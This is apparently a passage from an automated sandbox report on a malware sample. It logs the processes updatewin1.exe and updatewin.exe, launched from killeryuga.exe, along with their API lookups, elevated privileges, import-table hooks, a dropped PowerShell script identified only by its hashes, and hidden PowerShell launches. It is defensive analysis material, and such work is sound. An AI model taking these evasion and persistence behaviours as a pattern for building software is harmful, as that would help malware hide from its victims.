Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-03-24 16:36:36 (UTC) True 1
Fn
Get Time type = Ticks, time = 119434 True 1
Fn
Get Time type = Performance Ctr, time = 18165961372 True 1
Fn
Get Time type = Ticks, time = 119527 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = System Time, time = 2019-03-24 16:36:37 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 18233617619 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #10: updatewin1.exe
671 0
»
Information Value
ID #10
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe" --Admin
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:15
OS Process Information
»
Information Value
PID 0xa0c
Parent PID 0x9ec (c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A10
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x005A5000 0x005A5FFF Marked Executable - 32-bit - False
...
updatewin1.exe 0x00400000 0x0044CFFF Forced - 32-bit - False
...
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000590000:+0x1679d 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x0000000000b40000:+0x42f6f6
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 0.05 KB MD5: f972c62f986b5ed49ad7713d93bf6c9f
SHA1: 4e157002bdb97e9526ab97bfafbf7c67e1d1efbf
SHA256: b47f85974a7ec2fd5aa82d52f08eb0f6cea7e596a98dd29e8b85b5c37beca0a8
SSDeep: 3:uIHeGAFcX5wTnl:/eGgHTl 		False
...
Host Behavior
File (8)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 size = 49 True 1
Fn
Data
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create powershell os_pid = 0xa4c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create powershell os_pid = 0xb04, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module (150)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-03-24 16:36:37 (UTC) True 1
Fn
Get Time type = Ticks, time = 119777 True 1
Fn
Get Time type = Performance Ctr, time = 18199941480 True 1
Fn
Get Time type = Ticks, time = 119839 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = System Time, time = 2019-03-24 16:36:38 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 18298853611 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #11: updatewin.exe
714 0
»
Information Value
ID #11
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:15
OS Process Information
»
Information Value
PID 0xa18
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A1C
0x A70
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x004F5000 0x004F5FFF Marked Executable - 32-bit - False
...
updatewin.exe 0x00400000 0x0044DFFF Forced - 32-bit - False
...
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000004e0000:+0x16785 90. entry of updatewin.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to pagefile_0x0000000000900000:+0x700000
...
IAT private_0x00000000004e0000:+0x16785 121. entry of updatewin.exe 4 bytes user32.dll:CallMsgFilterW+0x0 now points to pagefile_0x0000000000900000:+0x700000
...
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Module (169)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load COMCTL32.dll base_address = 0x74820000 True 1
Fn
Load WINMM.dll base_address = 0x74af0000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDesktopWindow, address_out = 0x74f60a19 True 1
Fn
